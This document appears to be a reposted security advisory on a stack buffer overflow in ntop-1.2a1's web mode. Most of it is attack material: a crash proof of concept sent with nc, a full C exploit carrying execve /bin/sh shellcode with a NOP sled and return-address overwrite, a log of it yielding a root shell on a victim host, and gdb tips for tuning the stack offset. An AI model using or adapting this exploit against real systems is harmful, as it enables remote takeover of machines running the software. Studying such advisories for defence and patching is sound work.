[ SOURCE: http://www.secureroot.com/security/advisories/9735749658.html ]

1. Problem:

 ntop has a stack-based BOF when it's requested too long filename.

2. Tested Version

 ntop-1.2a1

 I only tested this version.

3. Example



 1. first run ntop -w 8080



 2. run this script

 $ printf "GET /`perl -e 'print "A"x240'`\r\n\r\n" |nc localhost 8080



 3. the ntop goes seg. fault.

 $ ntop -w 8080

  ntop v.1.2a1 MT [i686-pc-linux-gnu] listening on eth0.

  Copyright 1998-99 by Luca Deri <deri@unipi.it>

  Warning: unable to read file '.ntop'. No security will be used!

  Waiting for HTTP connections on port 8080...

  Segmentation fault

4. Exploit



----------------------ntop-w-exp.c-----start-----------------------

#include <stdio.h>

#include <string.h>





char shellcode[] =

  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

  "\x80\xe8\xdc\xff\xff\xff/bin/sh";



void usage()

{

 printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");

 printf("                                 mat@hacksware.com\n");

 printf("Usage : ./ntop-w-exp | nc victim port\n");

 exit(0);

}



void main( int argc, char *argv[] )

{

  int i,offset=-24;

#define CODE_LEN 240

#define NOP_LEN 50

  char code_buf[CODE_LEN];

  unsigned long esp=0xbedffb00;



  if(argc >= 2) offset = atoi(argv[1]);



  memset(code_buf,0x90,NOP_LEN); //insert NOP CODES

  memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));

  for(i=strlen(shellcode)+NOP_LEN;i<=CODE_LEN;i+=4)

     *(long *)&code_buf[i]=(unsigned long)esp-offset;



  printf("GET /");

  for(i=0;i<CODE_LEN; i++)

  {

     putchar(code_buf[i]);

  }

  printf("\r\n\r\n");

}

-------------------------ntop-w-exp.c----end--------------------------





5. Example

 1. first you run ntop -w 8080 in victim machine

  [mat@overheaven mat]$ id

  uid=500(mat) gid=500(mat) groups=500(mat),0(root),200(staff)

  [mat@overheaven mat]$ ntop -w 8080

  ntop v.1.2a1 MT [i686-pc-linux-gnu] listening on eth0.

  Copyright 1998-99 by Luca Deri <deri@unipi.it>

  Warning: unable to read file '.ntop'. No security will be used!

  Waiting for HTTP connections on port 8080...





 2. compile exploit

  $ gcc -o ntop-w-exp ntop-w-exp.c

 3. send shell code to overheaven

  $ ./ntop-w-exp |nc overheaven 8080

 4. Now you get root shell in overheaven terminal

  base# hostname

  overheaven

  bash# id

  uid=0(root) gid=500(mat) groups=500(mat),0(root),200(staff)

 5. You cannot get shell in WWW port, so you can alternatively run programs other than "/bin/sh" by modifying shellcode.

 6. If you cannot get shellcode to work, you must modify esp value in ntop-w-exp.c. Using gdb you can easily guess it.



    1. break returnHTTPPage

    2. break strcpy

    3. x/x $esp





=================================================

|                                               |

|               mat@hacksware.com               |

|                                               |

=================================================